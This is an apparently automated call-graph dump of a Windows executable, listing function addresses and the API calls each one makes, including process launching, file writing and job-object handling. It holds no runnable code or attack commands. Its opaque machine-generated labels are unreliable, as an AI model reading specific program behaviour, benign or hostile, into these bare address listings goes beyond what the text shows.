9774 4066e5 9770->9774 10376 407a5b ??3@YAXPAX 9771->10376 9777 406c44 ??3@YAXPAX 9772->9777 9782 4045f4 22 API calls 9772->9782 10377 405304 9773->10377 9780 4048c7 2 API calls 9774->9780 9775 406729 9781 401370 2 API calls 9775->9781 9777->9746 9784 4066f2 9780->9784 9785 406732 9781->9785 9783 406bfb 9782->9783 10363 404dae 9783->10363 9787 4013a9 2 API calls 9784->9787 9789 4041f8 20 API calls 9785->9789 9792 4066fe ??3@YAXPAX ??3@YAXPAX GetFileAttributesW 9787->9792 9788 406b49 ??3@YAXPAX ??3@YAXPAX 9788->9772 9806 40673b 9789->9806 9790 401370 2 API calls 9790->9793 9791 406c14 SetCurrentDirectoryW 9794 404dae 4 API calls 9791->9794 9795 406725 9792->9795 9796 406afa 9792->9796 9793->9755 9793->9764 9793->9765 9793->9775 9793->9788 9793->9790 9797 401526 2 API calls 9793->9797 9798 406c3c 9794->9798 9795->9775 9799 4044b0 16 API calls 9796->9799 9800 4067c9 ??3@YAXPAX ??3@YAXPAX 9797->9800 9801 4044b0 16 API calls 9798->9801 9802 406aff 9799->9802 9800->9793 9801->9777 9803 408dbf 57 API calls 9802->9803 9804 406b08 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9803->9804 9804->9563 9805 406b3e 9804->9805 9805->9563 9807 406868 _wtol 9806->9807 9808 404255 lstrlenW lstrlenW _wcsnicmp 9806->9808 9809 40692c 9806->9809 9807->9806 9808->9806 9810 406935 9809->9810 9811 406987 9809->9811 9812 40695a 9810->9812 9813 40693b 9810->9813 9814 4013a9 2 API calls 9811->9814 9815 401370 2 API calls 9812->9815 9816 401370 2 API calls 9813->9816 9817 406985 9814->9817 9819 406958 9815->9819 9818 406946 9816->9818 9820 4027c2 2 API calls 9817->9820 9822 4027c2 2 API calls 9818->9822 9821 4026b0 lstrcmpW 9819->9821 9823 406999 9820->9823 9825 40696f 9821->9825 9824 40694f 9822->9824 9826 401458 2 API calls 9823->9826 9827 4027c2 2 API calls 9824->9827 9825->9823 9830 4027c2 2 API calls 9825->9830 9828 4069a1 9826->9828 9827->9819 9829 404a97 2 API calls 9828->9829 9831 4069ae 9829->9831 9830->9817 9832 402771 2 API calls 9831->9832 9833 4069b9 9832->9833 9834 4041f8 
20 API calls 9833->9834 9835 4069c2 9834->9835 9836 406a9d 9835->9836 10092 40241d 9835->10092 9837 406bcb ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9836->9837 9839 406ab1 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9836->9839 9837->9772 9839->9768 9840 4069d7 9840->9836 9841 4069f1 9840->9841 9843 4027c2 2 API calls 9840->9843 9842 4041f8 20 API calls 9841->9842 9844 406a09 9842->9844 9843->9841 9845 406a10 9844->9845 9846 406a7f 9844->9846 10101 4048a9 9845->10101 10315 40503e 9846->10315 9850 406a8d 9851 406b68 SetLastError 9850->9851 9852 406a98 9850->9852 9855 406b6f 9851->9855 10360 4023b5 9852->10360 9857 408dbf 57 API calls 9855->9857 9859 406b79 9857->9859 9858 401551 2 API calls 9860 406a45 ??3@YAXPAX ??3@YAXPAX 9858->9860 9861 4044b0 16 API calls 9859->9861 10111 404f67 9860->10111 9863 406b7e 7 API calls 9861->9863 9865 406bbe 9863->9865 9864 406a69 9866 406b60 ??3@YAXPAX 9864->9866 9867 406a77 ??3@YAXPAX 9864->9867 9865->9837 9866->9855 9867->9852 9869 401d56 SetTimer GetMessageW DispatchMessageW KillTimer KiUserCallbackDispatcher 9868->9869 9870 401d89 GetVersionExW 9868->9870 9869->9870 9870->9516 9870->9517 9872 401172 2 API calls 9871->9872 9873 4044db GetCommandLineW 9872->9873 9874 404a97 9873->9874 9875 404ad1 9874->9875 9876 404aa5 9874->9876 9877 404ac9 9875->9877 9878 401526 2 API calls 9875->9878 9876->9877 9879 401526 2 API calls 9876->9879 9877->9528 9878->9875 9879->9876 9881 401458 2 API calls 9880->9881 9887 402de6 9881->9887 9882 402ecc 9883 4013a9 2 API calls 9882->9883 9884 402ed9 ??3@YAXPAX 9883->9884 9884->9531 9885 401526 ??2@YAPAXI ??3@YAXPAX 9885->9887 9887->9882 9887->9885 9888 401458 2 API calls 9887->9888 9890 4013a9 2 API calls 9887->9890 10416 40283b 9887->10416 10419 402ad8 9887->10419 9888->9887 9891 402e46 ??3@YAXPAX 9890->9891 9892 401429 2 API calls 9891->9892 9893 402e5b ??3@YAXPAX ??3@YAXPAX 9892->9893 9893->9887 9895 404407 9894->9895 9896 404421 lstrlenW lstrlenW 9895->9896 9897 404444 9895->9897 10430 401c74 
9896->10430 9897->9535 9897->9537 9900 40491a 9899->9900 9901 402131 3 API calls 9900->9901 9902 40491f 9901->9902 9903 402187 19 API calls 9902->9903 9904 404926 9903->9904 9905 402187 19 API calls 9904->9905 9906 404932 9905->9906 9907 402187 19 API calls 9906->9907 9908 40493e 9907->9908 9909 402187 19 API calls 9908->9909 9910 40494a 9909->9910 9911 402187 19 API calls 9910->9911 9912 404956 9911->9912 9913 402187 19 API calls 9912->9913 9914 404962 9913->9914 9915 402187 19 API calls 9914->9915 9921 40496e 9915->9921 9916 404989 SHGetSpecialFolderPathW 9917 4049a3 wsprintfW 9916->9917 9916->9921 9919 401458 2 API calls 9917->9919 9918 404a3c 9918->9538 9919->9921 9920 401458 2 API calls 9920->9921 9921->9916 9921->9918 9921->9920 9923 401370 ??2@YAPAXI ??3@YAXPAX 9921->9923 9924 4032d9 7 API calls 9921->9924 10440 40269a ??3@YAXPAX ??3@YAXPAX 9921->10440 9923->9921 9924->9921 10441 40236f LoadLibraryA GetProcAddress 9925->10441 9927 4023a5 9927->9575 10444 40c9b5 9928->10444 9932 40250f 2 API calls 9931->9932 9933 402837 9932->9933 9934 403c93 9933->9934 9935 40236f 3 API calls 9934->9935 9936 403ca1 9935->9936 9937 402823 2 API calls 9936->9937 9938 403cda 9937->9938 9939 402823 2 API calls 9938->9939 9940 403ce2 9939->9940 9941 402823 2 API calls 9940->9941 9942 403cea 9941->9942 10450 403ba2 9942->10450 9948 403d27 9949 403d80 9948->9949 9951 403ba2 7 API calls 9948->9951 9954 402bee 10 API calls 9948->9954 9958 402989 2 API calls 9948->9958 10496 402953 9948->10496 9950 403ba2 7 API calls 9949->9950 9952 403d96 9950->9952 9951->9948 9953 402bee 10 API calls 9952->9953 9955 403da8 9953->9955 9954->9948 10493 402989 9955->10493 9958->9948 9959 403e1e ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9959->9598 9960 403ba2 7 API calls 9962 403dbe 9960->9962 9961 402bee 10 API calls 9961->9962 9962->9959 9962->9960 9962->9961 9963 402953 2 API calls 9962->9963 9964 402989 2 API calls 9962->9964 9963->9962 9964->9962 9966 402823 2 API calls 9965->9966 9987 403415 9966->9987 
9967 4036b4 ??3@YAXPAX 9968 4036eb 9967->9968 9968->9608 9968->9613 9969 401458 ??2@YAPAXI ??3@YAXPAX 9969->9987 9970 402823 2 API calls 9970->9987 9971 4013a9 2 API calls 9972 403486 ??3@YAXPAX ??3@YAXPAX 9971->9972 9973 4036c0 9972->9973 9972->9987 10535 402d30 9973->10535 9977 4036e1 ??3@YAXPAX 9977->9968 9978 403593 strncmp 9979 40357e strncmp 9978->9979 9978->9987 9979->9978 9979->9987 9982 402ad8 ??2@YAPAXI ??3@YAXPAX MultiByteToWideChar 9982->9987 9983 4013a9 2 API calls 9984 403600 ??3@YAXPAX 9983->9984 9986 402dd6 9 API calls 9984->9986 9985 40292b 2 API calls 9985->9979 9988 403611 lstrcmpW 9986->9988 9987->9967 9987->9969 9987->9970 9987->9971 9987->9973 9987->9978 9987->9982 9987->9983 9987->9985 9989 40292b ??2@YAPAXI ??3@YAXPAX 9987->9989 9990 403648 lstrlenW wcsncmp 9987->9990 9992 4032d9 7 API calls 9987->9992 9993 401370 2 API calls 9987->9993 10526 402662 9987->10526 10530 40261a 9987->10530 10534 40269a ??3@YAXPAX ??3@YAXPAX 9987->10534 9988->9987 9989->9987 9990->9987 9992->9987 9993->9987 9995 4026b0 lstrcmpW 9994->9995 9996 404b1f 9995->9996 9997 404b6f 9996->9997 9999 401370 2 API calls 9996->9999 9998 4026b0 lstrcmpW 9997->9998 10000 404b8d 9998->10000 10001 404b36 9999->10001 10003 4026b0 lstrcmpW 10000->10003 10002 402187 19 API calls 10001->10002 10004 404b3d 10002->10004 10005 404ba5 10003->10005 10006 4027c2 2 API calls 10004->10006 10008 4026b0 lstrcmpW 10005->10008 10007 404b46 10006->10007 10009 401370 2 API calls 10007->10009 10010 404bbd 10008->10010 10011 404b5f 10009->10011 10013 4026b0 lstrcmpW 10010->10013 10012 402187 19 API calls 10011->10012 10014 404b66 10012->10014 10015 404bd5 10013->10015 10016 4027c2 2 API calls 10014->10016 10017 404bec 10015->10017 10018 404bdc lstrcmpiW 10015->10018 10016->9997 10019 4026b0 lstrcmpW 10017->10019 10018->10017 10020 404c02 10019->10020 10021 4026b0 lstrcmpW 10020->10021 10022 404c2f 10021->10022 10023 404c3c 10022->10023 10554 4043a6 10022->10554 10025 4026b0 lstrcmpW 10023->10025 
10029 404c50 10025->10029 10026 404c70 10028 4026b0 lstrcmpW 10026->10028 10035 404c83 10028->10035 10029->10026 10030 4026b0 lstrcmpW 10029->10030 10558 40434d 10029->10558 10030->10029 10031 404ca3 10032 4026b0 lstrcmpW 10031->10032 10034 404caf 10032->10034 10036 4026b0 lstrcmpW 10034->10036 10035->10031 10037 4026b0 lstrcmpW 10035->10037 10562 40437e 10035->10562 10038 404cc0 10036->10038 10037->10035 10039 4026b0 lstrcmpW 10038->10039 10040 404cd1 10039->10040 10041 404ce7 10040->10041 10042 404cde _wtol 10040->10042 10043 4026b0 lstrcmpW 10041->10043 10042->10041 10044 404cf3 10043->10044 10045 404d03 10044->10045 10046 404cfa _wtol 10044->10046 10047 4026b0 lstrcmpW 10045->10047 10046->10045 10048 404d0f 10047->10048 10049 4026b0 lstrcmpW 10048->10049 10050 404d27 10049->10050 10051 4026b0 lstrcmpW 10050->10051 10052 404d3f 10051->10052 10052->9675 10054 40261a lstrcmpW 10053->10054 10055 4026c1 10054->10055 10055->9682 10057 404648 10056->10057 10059 404605 10056->10059 10057->9644 10057->9645 10058 40133e 2 API calls 10058->10059 10059->10058 10060 4041f8 20 API calls 10059->10060 10061 404622 SetEnvironmentVariableW ??3@YAXPAX 10060->10061 10061->10057 10061->10059 10063 401458 2 API calls 10062->10063 10064 404556 10063->10064 10065 4027aa 2 API calls 10064->10065 10066 40455f GetTempPathW 10065->10066 10067 404578 10066->10067 10072 40458f 10066->10072 10068 4027aa 2 API calls 10067->10068 10069 404583 GetTempPathW 10068->10069 10069->10072 10070 4027aa 2 API calls 10071 4045b2 wsprintfW 10070->10071 10071->10072 10072->10070 10073 4045c9 GetFileAttributesW 10072->10073 10074 4045ed 10072->10074 10073->10072 10073->10074 10074->9722 10076 401745 10075->10076 10091 40d041 3 API calls 10076->10091 10077 401769 10078 401794 10077->10078 10570 40110a 10077->10570 10080 408dbf 57 API calls 10078->10080 10084 40179c 10080->10084 10082 4017bc 10083 4017d4 ??2@YAPAXI 10082->10083 10085 4036f1 88 API calls 10082->10085 10086 4017e0 10083->10086 10087 4017e7 
10083->10087 10084->9739 10088 4017cf 10085->10088 10593 401470 10086->10593 10574 401611 10087->10574 10088->10083 10088->10084 10091->10077 10093 402426 10092->10093 10094 40242b 10092->10094 10093->9840 10095 40236f 3 API calls 10094->10095 10096 402430 10095->10096 10097 402441 10096->10097 10098 40243a 10096->10098 10097->9840 11011 4023e9 LoadLibraryA GetProcAddress 10098->11011 10102 4044c6 2 API calls 10101->10102 10103 4048b7 10102->10103 10104 401429 2 API calls 10103->10104 10105 4048c2 10104->10105 10106 4048c7 10105->10106 10107 40133e 2 API calls 10106->10107 10108 4048d5 10107->10108 10109 4027c2 2 API calls 10108->10109 10110 4048e0 10109->10110 10110->9858 10112 401458 2 API calls 10111->10112 10113 404f78 10112->10113 10114 401458 2 API calls 10113->10114 10115 404f80 memset 10114->10115 10116 404fae 10115->10116 10117 404a97 2 API calls 10116->10117 10118 404fd1 10117->10118 10119 401370 2 API calls 10118->10119 10120 404fdc 10119->10120 10121 404fe1 ??3@YAXPAX 10120->10121 10122 404ffa ShellExecuteExW 10120->10122 10123 404fec ??3@YAXPAX 10121->10123 10124 405014 10122->10124 10125 40503a 10122->10125 10123->9864 10126 405028 CloseHandle 10124->10126 10127 40501d WaitForSingleObject 10124->10127 10128 405031 ??3@YAXPAX 10125->10128 10126->10128 10127->10126 10128->10123 10130 407c87 4 API calls 10129->10130 10131 404eb5 10130->10131 10132 402187 19 API calls 10131->10132 10133 404ec3 10132->10133 10134 402771 2 API calls 10133->10134 10135 404ecd 10134->10135 10136 404f03 wsprintfW 10135->10136 10138 4027c2 ??2@YAPAXI ??3@YAXPAX 10135->10138 10137 4027c2 2 API calls 10136->10137 10139 404f31 10137->10139 10138->10135 10140 4027c2 2 API calls 10139->10140 10141 404f3e 10140->10141 10142 407ce8 22 API calls 10141->10142 10143 404f53 ??3@YAXPAX 10142->10143 11013 407a5b ??3@YAXPAX 10143->11013 10145 404f64 10145->9563 10147 40cdda ctype 3 API calls 10146->10147 10148 404521 10147->10148 10149 40ccfd ctype 3 API calls 10148->10149 10150 40ce45 
??3@YAXPAX 10149->10150 10150->9551 10152 4052b4 10151->10152 10158 4052d0 10151->10158 10155 4052c6 _wtol 10152->10155 10152->10158 10153 404f67 9 API calls 10154 4052f3 10153->10154 10156 405301 10154->10156 10157 4052fb GetLastError 10154->10157 10155->10158 10156->9563 10157->10156 10158->10153 10160 40ca5c 2 API calls 10159->10160 10161 4054ed 10160->10161 10162 405549 10161->10162 10164 402771 2 API calls 10161->10164 10163 402823 2 API calls 10162->10163 10165 405551 10163->10165 10170 4054fc 10164->10170 10166 4028b9 2 API calls 10165->10166 10167 40555e 10166->10167 10168 402953 2 API calls 10167->10168 10172 40556b 10168->10172 10169 4055ba ??3@YAXPAX 10175 4055b6 10169->10175 10170->10169 10171 4036f1 88 API calls 10170->10171 10173 405520 10171->10173 10174 402953 2 API calls 10172->10174 10173->10169 10177 40ca5c 2 API calls 10173->10177 10176 405578 10174->10176 10175->9620 10178 402953 2 API calls 10176->10178 10180 40553c 10177->10180 10179 405585 10178->10179 10181 40d0a5 2 API calls 10179->10181 10180->10169 10182 405540 ??3@YAXPAX 10180->10182 10183 405599 10181->10183 10182->10162 10183->10169 10184 4055a2 ??3@YAXPAX 10183->10184 10184->10175 10186 4032e8 10185->10186 10188 4032f3 10185->10188 11014 4029b7 10186->11014 10189 4107a2 4 API calls 10188->10189 10190 4032ff 10189->10190 10190->9610 10191->9610 10193 402771 2 API calls 10192->10193 10194 404d62 10193->10194 10195 4027c2 2 API calls 10194->10195 10196 404d6f 10195->10196 10197 404d8b 10196->10197 10198 401526 2 API calls 10196->10198 10199 4027c2 2 API calls 10197->10199 10198->10196 10200 404d95 10199->10200 10201 40464b 94 API calls 10200->10201 10202 404da0 ??3@YAXPAX 10201->10202 10202->9675 10204 404662 lstrlenW 10203->10204 10205 40468e 10203->10205 10206 401c74 CharUpperW 10204->10206 10205->9675 10207 404678 10206->10207 10207->10204 10207->10205 10208 404695 10207->10208 10209 402771 2 API calls 10208->10209 10212 40469e 10209->10212 11019 402b20 10212->11019 10213 403400 87 
API calls 10214 40470c 10213->10214 10215 404716 ??3@YAXPAX ??3@YAXPAX 10214->10215 10216 40472d ??3@YAXPAX ??3@YAXPAX 10214->10216 10215->10205 10216->10205 10218 402491 CheckTokenMembership FreeSid 10217->10218 10219 4024ab 10217->10219 10218->10219 10219->9631 10219->9638 10221 40133e 2 API calls 10220->10221 10222 4048f3 10221->10222 10223 401526 2 API calls 10222->10223 10224 4048fe 10223->10224 10224->9696 10225->9695 10227 407c87 4 API calls 10226->10227 10228 4041b3 10227->10228 10228->9670 10229->9681 10234 409205 10230->10234 10243 408fa0 10230->10243 10231 4026b0 lstrcmpW 10231->10243 10232 407c87 4 API calls 10232->10243 10233 40851f 25 API calls 10233->10243 10234->9691 10235 4084df 25 API calls 10235->10243 10236 408461 25 API calls 10236->10243 10238 4041ab 4 API calls 10238->10243 10240 402187 19 API calls 10240->10243 10241 408dbf 57 API calls 10241->10243 10242 404497 4 API calls 10242->10243 10243->10231 10243->10232 10243->10233 10243->10234 10243->10235 10243->10236 10243->10238 10243->10240 10243->10241 10243->10242 10244 408d52 27 API calls 10243->10244 10245 407ce8 22 API calls 10243->10245 11029 407d62 10243->11029 11033 407a5b ??3@YAXPAX 10243->11033 10244->10243 10245->10243 10247 4026b0 lstrcmpW 10246->10247 10248 408ec8 10247->10248 10249 408ed6 10248->10249 11034 401bdf GetStdHandle WriteFile 10248->11034 10251 408ee9 10249->10251 11035 401bdf GetStdHandle WriteFile 10249->11035 10253 408efe 10251->10253 11036 401bdf GetStdHandle WriteFile 10251->11036 10257 408f0f 10253->10257 11037 401bdf GetStdHandle WriteFile 10253->11037 10256 4026b0 lstrcmpW 10258 408f1c 10256->10258 10257->10256 10259 408f2a 10258->10259 11038 401bdf GetStdHandle WriteFile 10258->11038 10260 4026b0 lstrcmpW 10259->10260 10262 408f37 10260->10262 10263 408f45 10262->10263 11039 401bdf GetStdHandle WriteFile 10262->11039 10265 4026b0 lstrcmpW 10263->10265 10266 408f52 10265->10266 10267 408f60 10266->10267 11040 401bdf GetStdHandle WriteFile 10266->11040 10269 
4026b0 lstrcmpW 10267->10269 10270 408f6d 10269->10270 10271 408f7d 10270->10271 11041 401bdf GetStdHandle WriteFile 10270->11041 10271->9684 10274 408484 10273->10274 10275 4084b7 10274->10275 10276 408499 10274->10276 11045 407e6c 10275->11045 11042 407e3a 10276->11042 10281 407ce8 22 API calls 10283 4084b2 10281->10283 10282 407ce8 22 API calls 10282->10283 11048 407a5b ??3@YAXPAX 10283->11048 10285 4084da 10285->9689 10287 4084f4 10286->10287 10288 407e53 4 API calls 10287->10288 10289 4084ff 10288->10289 10290 407ce8 22 API calls 10289->10290 10291 408510 10290->10291 11052 407a5b ??3@YAXPAX 10291->11052 10293 40851a 10293->9689 10295 408532 10294->10295 11053 407e85 10295->11053 10298 407ce8 22 API calls 10299 408567 10298->10299 11056 407a5b ??3@YAXPAX 10299->11056 10301 408571 10301->9739 10303 4044c4 ??3@YAXPAX ??3@YAXPAX 10302->10303 10304 4044b9 10302->10304 10303->9563 10305 402ff3 16 API calls 10304->10305 10305->10303 10307 4026b0 lstrcmpW 10306->10307 10308 404a60 10307->10308 10309 404a95 10308->10309 10310 401370 2 API calls 10308->10310 10309->9793 10311 404a6f 10310->10311 10312 4041f8 20 API calls 10311->10312 10313 404a75 10312->10313 10313->10309 10314 401526 2 API calls 10313->10314 10314->10309 10316 401458 2 API calls 10315->10316 10317 405053 10316->10317 10318 401458 2 API calls 10317->10318 10319 40505b GetCommandLineW 10318->10319 10320 404a97 2 API calls 10319->10320 10321 40506b 10320->10321 10322 4048a9 2 API calls 10321->10322 10323 40509e 10322->10323 10324 4048c7 2 API calls 10323->10324 10325 4050ab 10324->10325 10326 4048c7 2 API calls 10325->10326 10327 4050b8 10326->10327 10328 4048e5 2 API calls 10327->10328 10329 4050c5 10328->10329 10330 4048e5 2 API calls 10329->10330 10331 4050d2 10330->10331 10332 4048e5 2 API calls 10331->10332 10333 4050df 10332->10333 10334 4048e5 2 API calls 10333->10334 10335 4050ec 10334->10335 10336 4048c7 2 API calls 10335->10336 10337 4050f9 10336->10337 10338 4048c7 2 API calls 10337->10338 
10339 405106 10338->10339 10340 4048c7 2 API calls 10339->10340 10341 405113 10340->10341 10342 4013a9 2 API calls 10341->10342 10343 40511f 12 API calls 10342->10343 10344 4051b4 GetLastError 10343->10344 10345 4051d7 CreateJobObjectW 10343->10345 10346 4051bc ??3@YAXPAX ??3@YAXPAX 10344->10346 10347 405252 ResumeThread WaitForSingleObject 10345->10347 10348 4051ef AssignProcessToJobObject 10345->10348 10346->9850 10350 405262 CloseHandle GetExitCodeProcess 10347->10350 10348->10347 10349 4051fd CreateIoCompletionPort 10348->10349 10349->10347 10351 40520f SetInformationJobObject ResumeThread 10349->10351 10352 405288 CloseHandle 10350->10352 10353 40527f GetLastError 10350->10353 10356 40523d GetQueuedCompletionStatus 10351->10356 10354 405291 CloseHandle 10352->10354 10355 405294 10352->10355 10353->10352 10354->10355 10357 40529a CloseHandle 10355->10357 10358 40529f 10355->10358 10356->10347 10359 405237 10356->10359 10357->10358 10358->10346 10359->10350 10359->10356 10361 4023d9 10360->10361 10362 4023be LoadLibraryA GetProcAddress 10360->10362 10361->9836 10362->10361 10364 401458 2 API calls 10363->10364 10372 404dbf 10364->10372 10365 401370 2 API calls 10365->10372 10366 404e51 10367 404e8b ??3@YAXPAX 10366->10367 10369 404dae 3 API calls 10366->10369 10367->9791 10368 401526 2 API calls 10368->10372 10371 404e88 10369->10371 10370 4026b0 lstrcmpW 10370->10372 10371->10367 10372->10365 10372->10366 10372->10368 10372->10370 10374 407c87 4 API calls 10373->10374 10375 40449f 10374->10375 10375->9766 10376->9749 10378 4054b6 ??3@YAXPAX 10377->10378 10379 40531a 10377->10379 10381 4054bc 10378->10381 10379->10378 10380 40532e GetDriveTypeW 10379->10380 10380->10378 10382 40535a 10380->10382 10381->9752 10383 404545 6 API calls 10382->10383 10384 405368 CreateFileW 10383->10384 10385 405480 ??3@YAXPAX ??3@YAXPAX 10384->10385 10386 40538e 10384->10386 10385->10381 10387 401458 2 API calls 10386->10387 10388 405397 10387->10388 10389 401370 2 API calls 
10388->10389 10390 4053a4 10389->10390 10391 4027c2 2 API calls 10390->10391 10392 4053b2 10391->10392 10393 401429 2 API calls 10392->10393 10394 4053be 10393->10394 10395 4027c2 2 API calls 10394->10395 10396 4053cc 10395->10396 10397 4027c2 2 API calls 10396->10397 10398 4053d9 10397->10398 10399 401429 2 API calls 10398->10399 10400 4053e5 10399->10400 10401 4027c2 2 API calls 10400->10401 10402 4053f2 10401->10402 10403 4027c2 2 API calls 10402->10403 10404 4053fb 10403->10404 10405 401429 2 API calls 10404->10405 10406 405407 10405->10406 10407 4027c2 2 API calls 10406->10407 10408 405410 10407->10408 10409 402b20 3 API calls 10408->10409 10410 405422 WriteFile ??3@YAXPAX CloseHandle 10409->10410 10411 405450 10410->10411 10412 405491 10410->10412 10411->10412 10413 405458 SetFileAttributesW ShellExecuteW ??3@YAXPAX 10411->10413 10414 402ff3 16 API calls 10412->10414 10413->10385 10415 405499 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 10414->10415 10415->10381 10425 40250f 10416->10425 10420 401458 2 API calls 10419->10420 10421 402ae4 10420->10421 10422 402b1c 10421->10422 10423 4027aa 2 API calls 10421->10423 10422->9887 10424 402b01 MultiByteToWideChar 10423->10424 10424->10422 10426 402549 10425->10426 10427 40251d ??2@YAPAXI 10425->10427 10426->9887 10427->10426 10428 40252e ??3@YAXPAX 10427->10428 10428->10426 10431 401cc2 10430->10431 10433 401c82 10430->10433 10431->9897 10432 40ccb4 CharUpperW 10432->10433 10433->10431 10433->10432 10434 401ccf 10433->10434 10438 40ccb4 CharUpperW 10434->10438 10436 401cdf 10439 40ccb4 CharUpperW 10436->10439 10438->10436 10439->10431 10440->9921 10442 402390 GetNativeSystemInfo 10441->10442 10443 40239c 10441->10443 10442->9927 10443->9927 10447 40c998 10444->10447 10448 40c95f 2 API calls 10447->10448 10449 405be0 10448->10449 10449->9591 10449->9592 10500 4028b9 10450->10500 10453 4028b9 2 API calls 10454 403bc9 10453->10454 10504 402a0d 10454->10504 10457 4028f3 2 API calls 10458 403be6 ??3@YAXPAX 10457->10458 10459 402a0d 
3 API calls 10458->10459 10460 403c01 10459->10460 10461 4028f3 2 API calls 10460->10461 10462 403c0c ??3@YAXPAX 10461->10462 10463 403c22 10462->10463 10464 403c4c 10462->10464 10463->10464 10465 403c27 wsprintfA 10463->10465 10466 403c52 wsprintfA 10464->10466 10467 403c79 10464->10467 10468 402953 2 API calls 10465->10468 10469 402953 2 API calls 10466->10469 10470 402953 2 API calls 10467->10470 10472 403c41 10468->10472 10473 403c6e 10469->10473 10471 403c86 10470->10471 10474 402953 2 API calls 10471->10474 10475 402953 2 API calls 10472->10475 10476 402953 2 API calls 10473->10476 10477 403c8e 10474->10477 10475->10464 10476->10467 10478 402bee 10477->10478 10479 402bfb 10478->10479 10487 40d041 3 API calls 10479->10487 10480 402c0d lstrlenA lstrlenA 10482 402c3a 10480->10482 10481 402d18 10489 4028f3 10481->10489 10482->10481 10483 402ce5 memmove 10482->10483 10484 402c85 memcmp 10482->10484 10485 402cc2 memcmp 10482->10485 10488 40d00d GetLastError 10482->10488 10519 40292b 10482->10519 10483->10481 10483->10482 10484->10481 10484->10482 10485->10482 10487->10480 10488->10482 10490 4028ff 10489->10490 10492 402910 10489->10492 10491 40250f 2 API calls 10490->10491 10491->10492 10492->9948 10494 40255b 2 API calls 10493->10494 10495 402999 10494->10495 10495->9962 10497 402962 10496->10497 10498 40255b 2 API calls 10497->10498 10499 40296f 10498->10499 10499->9948 10501 4028cf 10500->10501 10502 40250f 2 API calls 10501->10502 10503 4028dc 10502->10503 10503->10453 10505 402a28 10504->10505 10506 402a3f 10505->10506 10507 402a34 10505->10507 10508 402823 2 API calls 10506->10508 10516 40286b 10507->10516 10510 402a48 10508->10510 10511 40250f 2 API calls 10510->10511 10513 402a51 10511->10513 10512 402a3d 10512->10457 10514 40286b 2 API calls 10513->10514 10515 402a7f ??3@YAXPAX 10514->10515 10515->10512 10517 40250f 2 API calls 10516->10517 10518 402886 10517->10518 10518->10512 10522 40255b 10519->10522 10523 40259f 10522->10523 10524 40256f 10522->10524 
10523->10482 10525 40250f 2 API calls 10524->10525 10525->10523 10527 402697 10526->10527 10528 40266f lstrcmpW 10526->10528 10527->9987 10529 402686 10528->10529 10529->10527 10529->10528 10533 402625 10530->10533 10531 402631 lstrcmpW 10532 40264e 10531->10532 10531->10533 10532->9987 10533->10531 10533->10532 10534->9987 10536 402d4b 10535->10536 10537 402d3f 10535->10537 10539 402823 2 API calls 10536->10539 10553 401bdf GetStdHandle WriteFile 10537->10553 10541 402d55 10539->10541 10540 402d46 10552 40269a ??3@YAXPAX ??3@YAXPAX 10540->10552 10542 402d80 10541->10542 10547 40292b 2 API calls 10541->10547 10543 402ad8 3 API calls 10542->10543 10544 402d92 10543->10544 10545 402da0 10544->10545 10546 402db4 10544->10546 10548 408dbf 57 API calls 10545->10548 10549 408dbf 57 API calls 10546->10549 10547->10541 10550 402daf ??3@YAXPAX ??3@YAXPAX 10548->10550 10549->10550 10550->10540 10552->9977 10553->10540 10555 4043c4 10554->10555 10566 4042ea 10555->10566 10559 40435a 10558->10559 10560 4042ea _wtol 10559->10560 10561 40437b 10560->10561 10561->10029 10563 40438b 10562->10563 10564 4042ea _wtol 10563->10564 10565 4043a3 10564->10565 10565->10035 10567 4042f4 10566->10567 10568 40430f _wtol 10567->10568 10569 404348 10567->10569 10568->10567 10569->10023 10598 410e26 10570->10598 10606 410329 _EH_prolog 10570->10606 10571 40112a 10571->10078 10571->10082 10575 401624 10574->10575 10576 401370 2 API calls 10575->10576 10577 401631 10576->10577 10578 401526 2 API calls 10577->10578 10579 40163a CreateThread 10578->10579 10580 401669 10579->10580 10581 40166e WaitForSingleObject 10579->10581 11005 4012e3 10579->11005 10582 40851f 25 API calls 10580->10582 10583 40168b 10581->10583 10584 4016bd 10581->10584 10582->10581 10587 4016a9 10583->10587 10589 40169a 10583->10589 10585 4016b9 10584->10585 10586 4016c5 GetExitCodeThread 10584->10586 10585->10084 10588 4016dc 10586->10588 10590 408dbf 57 API calls 10587->10590 10588->10585 10588->10589 10591 40170b 
SetLastError 10588->10591 10589->10585 10592 408dbf 57 API calls 10589->10592 10590->10585 10591->10589 10592->10585 10594 401458 2 API calls 10593->10594 10595 401489 10594->10595 10596 401458 2 API calls 10595->10596 10597 401495 10596->10597 10597->10087 10599 410e38 10598->10599 10605 40d041 3 API calls 10599->10605 10600 410e4c 10603 410e83 10600->10603 10604 40d041 3 API calls 10600->10604 10601 410e60 10601->10603 10622 410ccb 10601->10622 10603->10571 10604->10601 10605->10600 10607 410349 10606->10607 10608 410e26 11 API calls 10607->10608 10609 41036e 10608->10609 10610 410390 10609->10610 10611 410377 10609->10611 10650 4127aa _EH_prolog 10610->10650 10653 40ff49 10611->10653 10635 40e0d0 10622->10635 10624 410cf7 10624->10603 10625 410ce3 10625->10624 10638 40e036 10625->10638 10628 410d30 10629 410dc4 ??3@YAXPAX 10628->10629 10630 410dcf ??3@YAXPAX 10628->10630 10632 410dad memmove 10628->10632 10633 410dd9 memcpy 10628->10633 10629->10624 10630->10624 10632->10628 10634 40d041 3 API calls 10633->10634 10634->10630 10646 40e085 10635->10646 10639 40e080 memcpy 10638->10639 10640 40e043 10638->10640 10639->10628 10641 40e048 ??2@YAPAXI 10640->10641 10642 40e06e 10640->10642 10643 40e070 ??3@YAXPAX 10641->10643 10644 40e058 memmove 10641->10644 10642->10643 10643->10639 10644->10643 10647 40e0c9 10646->10647 10648 40e097 10646->10648 10647->10625 10648->10647 10649 40d00d GetLastError 10648->10649 10649->10648 10661 412525 10650->10661 10988 40fdd9 10653->10988 10683 40fc0a 10661->10683 10806 40fb7b 10683->10806 10807 40cdda ctype 3 API calls 10806->10807 10808 40fb84 10807->10808 10809 40cdda ctype 3 API calls 10808->10809 10810 40fb8c 10809->10810 10811 40cdda ctype 3 API calls 10810->10811 10812 40fb94 10811->10812 10813 40cdda ctype 3 API calls 10812->10813 10814 40fb9c 10813->10814 10815 40cdda ctype 3 API calls 10814->10815 10816 40fba4 